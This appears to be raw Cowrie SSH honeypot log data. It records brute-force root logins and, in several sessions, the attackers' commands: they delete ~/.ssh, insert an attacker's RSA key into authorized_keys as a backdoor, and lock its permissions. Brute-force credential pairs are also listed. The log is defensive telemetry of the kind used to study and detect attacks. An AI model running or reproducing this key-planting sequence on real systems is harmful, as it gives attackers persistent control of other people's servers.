{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-26T02:29:39.056133Z","src_ip":"79.124.8.120","session":"cf5710396db4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T02:29:39.112348Z","src_ip":"79.124.8.120","session":"cf5710396db4"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":64020,"dst_ip":"1.2.3.4","dst_port":22,"session":"8ff014d68456","protocol":"ssh","message":"New connection: 217.72.205.35:64020 (1.2.3.4:22) [session: 8ff014d68456]","sensor":"my-vps","timestamp":"2025-08-26T02:30:18.514068Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:30:18.515129Z","src_ip":"217.72.205.35","session":"8ff014d68456"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50320,"dst_ip":"1.2.3.4","dst_port":22,"session":"38f617e529d4","protocol":"ssh","message":"New connection: 212.227.235.229:50320 (1.2.3.4:22) [session: 38f617e529d4]","sensor":"my-vps","timestamp":"2025-08-26T02:30:22.187403Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T02:30:22.188782Z","src_ip":"212.227.235.229","session":"38f617e529d4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T02:30:22.470985Z","src_ip":"212.227.235.229","session":"38f617e529d4"}
{"eventid":"cowrie.login.success","username":"root","password":"Vps12345","message":"login attempt [root/Vps12345] succeeded","sensor":"my-vps","timestamp":"2025-08-26T02:30:23.636806Z","src_ip":"212.227.235.229","session":"38f617e529d4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T02:30:24.214606Z","src_ip":"212.227.235.229","session":"38f617e529d4"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T02:30:24.215476Z","src_ip":"212.227.235.229","session":"38f617e529d4"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T02:30:24.216452Z","src_ip":"212.227.235.229","session":"38f617e529d4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:30:24.502439Z","src_ip":"212.227.235.229","session":"38f617e529d4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T02:30:25.165915Z","src_ip":"212.227.235.229","session":"38f617e529d4"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T02:30:25.166588Z","src_ip":"212.227.235.229","session":"38f617e529d4"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T02:30:25.450297Z","src_ip":"212.227.235.229","session":"38f617e529d4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:30:25.451252Z","src_ip":"212.227.235.229","session":"38f617e529d4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43860,"dst_ip":"1.2.3.4","dst_port":22,"session":"5edd90119eb5","protocol":"ssh","message":"New connection: 212.227.235.229:43860 (1.2.3.4:22) [session: 5edd90119eb5]","sensor":"my-vps","timestamp":"2025-08-26T02:30:25.710546Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T02:30:25.711562Z","src_ip":"212.227.235.229","session":"5edd90119eb5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T02:30:25.969712Z","src_ip":"212.227.235.229","session":"5edd90119eb5"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T02:30:27.045370Z","src_ip":"212.227.235.229","session":"5edd90119eb5"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:30:28.306317Z","src_ip":"212.227.235.229","session":"5edd90119eb5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43876,"dst_ip":"1.2.3.4","dst_port":22,"session":"43b576933317","protocol":"ssh","message":"New connection: 212.227.235.229:43876 (1.2.3.4:22) [session: 43b576933317]","sensor":"my-vps","timestamp":"2025-08-26T02:30:28.585150Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T02:30:28.586128Z","src_ip":"212.227.235.229","session":"43b576933317"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T02:30:28.865917Z","src_ip":"212.227.235.229","session":"43b576933317"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T02:30:30.026902Z","src_ip":"212.227.235.229","session":"43b576933317"}
{"eventid":"cowrie.session.closed","duration":"8.1","message":"Connection lost after 8.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:30:30.309020Z","src_ip":"212.227.235.229","session":"38f617e529d4"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:30:30.310046Z","src_ip":"212.227.235.229","session":"43b576933317"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60808,"dst_ip":"1.2.3.4","dst_port":22,"session":"95233f56fda0","protocol":"ssh","message":"New connection: 212.227.235.229:60808 (1.2.3.4:22) [session: 95233f56fda0]","sensor":"my-vps","timestamp":"2025-08-26T02:31:40.656045Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T02:31:40.657248Z","src_ip":"212.227.235.229","session":"95233f56fda0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T02:31:40.937721Z","src_ip":"212.227.235.229","session":"95233f56fda0"}
{"eventid":"cowrie.login.success","username":"root","password":"0206","message":"login attempt [root/0206] succeeded","sensor":"my-vps","timestamp":"2025-08-26T02:31:42.096746Z","src_ip":"212.227.235.229","session":"95233f56fda0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T02:31:42.730595Z","src_ip":"212.227.235.229","session":"95233f56fda0"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T02:31:42.731337Z","src_ip":"212.227.235.229","session":"95233f56fda0"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T02:31:42.732518Z","src_ip":"212.227.235.229","session":"95233f56fda0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:31:43.013941Z","src_ip":"212.227.235.229","session":"95233f56fda0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T02:31:43.596109Z","src_ip":"212.227.235.229","session":"95233f56fda0"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T02:31:43.596851Z","src_ip":"212.227.235.229","session":"95233f56fda0"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T02:31:43.880270Z","src_ip":"212.227.235.229","session":"95233f56fda0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:31:43.881313Z","src_ip":"212.227.235.229","session":"95233f56fda0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60820,"dst_ip":"1.2.3.4","dst_port":22,"session":"1226c7bb62ed","protocol":"ssh","message":"New connection: 212.227.235.229:60820 (1.2.3.4:22) [session: 1226c7bb62ed]","sensor":"my-vps","timestamp":"2025-08-26T02:31:44.138835Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T02:31:44.139829Z","src_ip":"212.227.235.229","session":"1226c7bb62ed"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33042,"dst_ip":"1.2.3.4","dst_port":22,"session":"ef5fe108075f","protocol":"ssh","message":"New connection: 212.227.235.229:33042 (1.2.3.4:22) [session: ef5fe108075f]","sensor":"my-vps","timestamp":"2025-08-26T02:31:44.250067Z"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T02:31:44.399466Z","src_ip":"212.227.235.229","session":"1226c7bb62ed"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T02:31:44.871709Z","src_ip":"212.227.235.229","session":"ef5fe108075f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T02:31:44.872445Z","src_ip":"212.227.235.229","session":"ef5fe108075f"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T02:31:45.481747Z","src_ip":"212.227.235.229","session":"1226c7bb62ed"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:31:46.742126Z","src_ip":"212.227.235.229","session":"1226c7bb62ed"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40382,"dst_ip":"1.2.3.4","dst_port":22,"session":"cb95057465f9","protocol":"ssh","message":"New connection: 212.227.235.229:40382 (1.2.3.4:22) [session: cb95057465f9]","sensor":"my-vps","timestamp":"2025-08-26T02:31:47.023009Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T02:31:47.023944Z","src_ip":"212.227.235.229","session":"cb95057465f9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T02:31:47.306598Z","src_ip":"212.227.235.229","session":"cb95057465f9"}
{"eventid":"cowrie.login.success","username":"root","password":"Kahlan@123","message":"login attempt [root/Kahlan@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T02:31:47.486602Z","src_ip":"212.227.235.229","session":"ef5fe108075f"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:31:48.051960Z","src_ip":"212.227.235.229","session":"ef5fe108075f"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T02:31:48.480326Z","src_ip":"212.227.235.229","session":"cb95057465f9"}
{"eventid":"cowrie.session.closed","duration":"8.1","message":"Connection lost after 8.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:31:48.762196Z","src_ip":"212.227.235.229","session":"95233f56fda0"}
